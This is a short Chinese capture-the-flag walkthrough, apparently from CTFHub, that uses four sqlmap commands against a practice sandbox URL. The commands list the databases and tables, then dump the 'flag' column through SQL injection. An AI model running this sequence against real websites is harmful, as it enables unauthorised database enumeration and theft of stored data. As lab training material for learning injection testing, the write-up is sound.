使用 SQLMap 自动化注入
查询数据库信息
sqlmap -u "http://challenge-e2425f7d4be52884.sandbox.ctfhub.com:10800/?id=1" --batch --dbs --threads 4
由此观之,有数据库sqli。
查询数据库中的表
sqlmap -u "http://challenge-e2425f7d4be52884.sandbox.ctfhub.com:10800/?id=1" --batch --threads 4 -D sqli --tables
由此观之,有 2 张表,分别是flag和news。
查询flag表的结构
sqlmap -u "http://challenge-e2425f7d4be52884.sandbox.ctfhub.com:10800/?id=1" --batch --threads 4 -D sqli -T flag --columns
由此观之,flag表中只有 1 个字段,名为flag。
查询表里的记录
sqlmap -u "http://challenge-e2425f7d4be52884.sandbox.ctfhub.com:10800/?id=1" --batch --threads 4 -D sqli -T flag -C flag --dump
若有收获,就点个赞吧
0 人点赞
